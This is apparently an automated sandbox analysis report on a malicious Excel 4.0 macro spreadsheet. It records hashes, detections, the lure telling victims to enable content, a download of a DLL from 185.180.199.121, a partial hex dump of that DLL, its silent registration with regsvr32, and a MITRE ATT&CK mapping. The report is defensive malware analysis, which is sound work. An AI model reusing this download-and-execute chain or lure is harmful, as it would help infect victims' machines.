Play interactive tourEdit tour

# Analysis Report Delivery_Information_7038598.xlsb

## Overview

### General Information

 Sample Name: Delivery_Information_7038598.xlsb Analysis ID: 432152 MD5: aa12a71a4c31152958b75aa2cc0dd605 SHA1: 1709bd79ab07bc915d19b351a0c6000fafb91d70 SHA256: 201d6c214af9eea64e1882a17b2b14a789c50aa6202192b5474cd890bae4f1bf Infos: Most interesting Screenshot:

### Detection

Hidden Macro 4.0
 Score: 88 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Checks if the current process is being debugged
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

### Classification

 System is w10x64EXCEL.EXE (PID: 6536 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)regsvr32.exe (PID: 3144 cmdline: regsvr32 -s ..\kdldyeff.dll MD5: 426E7499F6A7346F0410DEAD0805586B)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

## Sigma Overview

### System Summary:

 Sigma detected: Microsoft Office Product Spawning Windows Shell Show sources
 Source: Process started Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\kdldyeff.dll, CommandLine: regsvr32 -s ..\kdldyeff.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6536, ProcessCommandLine: regsvr32 -s ..\kdldyeff.dll, ProcessId: 3144

## Signature Overview

 Uses new MSVCR Dlls Show sources

### Software Vulnerabilities:

 Document exploit detected (creates forbidden files) Show sources
 Document exploit detected (drops PE files) Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: sat1_0609_2[1].dll.0.dr Jump to dropped file
 Document exploit detected (process start blacklist hit) Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
 Potential document exploit detected (performs HTTP gets) Show sources
 Source: global traffic TCP traffic: 192.168.2.4:49747 -> 185.180.199.121:80
 Potential document exploit detected (unknown TCP traffic) Show sources
 Source: global traffic TCP traffic: 192.168.2.4:49747 -> 185.180.199.121:80
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 09 Jun 2021 17:46:14 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 13:51:29 GMTETag: "62de0-5c4559247da40"Accept-Ranges: bytesContent-Length: 404960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 b6 fb 1c 25 d7 95 4f 25 d7 95 4f 25 d7 95 4f 4a a1 0b 4f 3f d7 95 4f 4a a1 3f 4f a7 d7 95 4f 2c af 06 4f 22 d7 95 4f 25 d7 94 4f 7f d7 95 4f 4a a1 3e 4f 0a d7 95 4f 4a a1 0e 4f 24 d7 95 4f 4a a1 0f 4f 24 d7 95 4f 4a a1 08 4f 24 d7 95 4f 52 69 63 68 25 d7 95 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ed c3 c0 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 7a 01 00 00 8c 04 00 00 00 00 00 c1 73 00 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 06 00 00 04 00 00 c7 7b 06 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 e9 01 00 51 00 00 00 34 e2 01 00 50 00 00 00 00 30 02 00 00 f6 03 00 00 00 00 00 00 00 00 00 00 0a 06 00 e0 23 00 00 00 30 06 00 e4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 cd 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7d 79 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 41 5a 00 00 00 90 01 00 00 5c 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 39 00 00 00 f0 01 00 00 1a 00 00 00 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 f6 03 00 00 30 02 00 00 f6 03 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9a 1f 00 00 00 30 06 00 00 20 00 00 00 ea 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive
 Connects to IPs without corresponding DNS lookups Show sources
 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121
 Source: global traffic HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive
 URLs found in memory or binary data Show sources

### System Summary:

 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) Show sources
 Source: Screenshot number: 4 Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 14 Protected View This f Source: Screenshot number: 4 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start " 18 the decryption of the doc
 Found Excel 4.0 Macro with suspicious formulas Show sources
 Source: Delivery_Information_7038598.xlsb Initial sample: CALL Source: Delivery_Information_7038598.xlsb Initial sample: CALL Source: Delivery_Information_7038598.xlsb Initial sample: EXEC
 Office process drops PE file Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll Jump to dropped file
 Tries to load missing DLLs Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal88.expl.evad.winXLSB@3/11@0/1
 Creates files inside the user directory Show sources
 Creates temporary files Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{7BE2EDF5-A9C4-4DEF-9DC0-1522802C2D95} - OProcSessId.dat Jump to behavior
 Spawns processes Show sources
 Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll Jump to behavior
 Found graphical window changes (likely an installer) Show sources
 Source: Window Recorder Window detected: More than 3 window changes detected
 Document is a ZIP file with path names indicative of goodware Show sources
 Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image1.png Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image2.png Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image3.png Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image4.png Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image5.png
 Checks if Microsoft Office is installed Show sources
 Uses new MSVCR Dlls Show sources
 Registers a DLL Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_03042ABC push dword ptr [edx+14h]; ret 2_2_03042BFD
 Drops PE files Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll Jump to dropped file
 Drops PE files to the user directory Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll Jump to dropped file

### Boot Survival:

 Drops PE files to the user root directory Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll Jump to dropped file
 Disables application error messsages (SetErrorMode) Show sources
 Found dropped PE file which has not been started or loaded Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll Jump to dropped file
 May sleep (evasive loops) to hinder dynamic analysis Show sources
 Contains medium sleeps (>= 30s) Show sources
 Checks if the current process is being debugged Show sources
 Yara detected Xls With Macro 4.0 Show sources
 Source: Yara match File source: app.xml, type: SAMPLE

## Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1DLL Side-Loading1Process Injection1Masquerading111OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution42Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Hide Legend

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language